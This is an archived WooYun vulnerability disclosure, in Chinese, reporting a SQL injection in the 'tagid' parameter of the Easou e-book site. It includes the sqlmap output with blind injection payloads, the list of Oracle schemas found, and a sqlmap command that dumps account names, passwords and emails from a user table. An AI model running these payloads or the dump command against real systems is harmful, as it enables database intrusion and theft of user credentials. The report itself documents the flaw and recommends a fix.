乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-19: 细节已通知厂商并且等待厂商处理中 2015-01-24: 厂商已经主动忽略漏洞,细节向公众公开
两百多张数据表:)
宜搜精品书城(http://shu.easou.com/)
漏洞地址:http://shu.easou.com/reader.e?tagid=38&rpt=list&esid=7uTD95pbqN1&qd=M3150001&fr=3.r1_c.93"
问题参数:tagid
GET parameter 'tagid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection points with a total of 70 HTTP(s) requests:---Place: GETParameter: tagid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: tagid=38 AND 2945=2945&rpt=list&esid=7uTD95pbqN1&qd=M3150001&fr=3.r1_c.93 Type: AND/OR time-based blind Title: Oracle AND time-based blind (comment) Payload: tagid=38 AND 9794=DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(76)||CHR(66)||CHR(85),5)--&rpt=list&esid=7uTD95pbqN1&qd=M3150001&fr=3.r1_c.93---[02:13:19] [INFO] the back-end DBMS is Oracleweb application technology: Nginxback-end DBMS: Oracle
available databases [18]:[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EASOUPVT[*] ESADS[*] EXFSYS[*] MDSYS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SCOTT[*] SEL_ESADS[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB
找个数据表跑了下数据,仅测试几条证明漏洞
sqlmap.py -u "http://shu.easou.com/reader.e?tagid=38&rpt=list&esid=7uTD95pbqN1&qd=M3150001&fr=3.r1_c.93" --dump -C "ACCOUNT,NAME,PASSWORD,MAIL" -T 'UMS_USER' -D 'ESADS'
200多表啊,不一一跑出来了,请尽快修复
严格过滤参数
危害等级:无影响厂商忽略
忽略时间:2015-01-24 18:56
暂无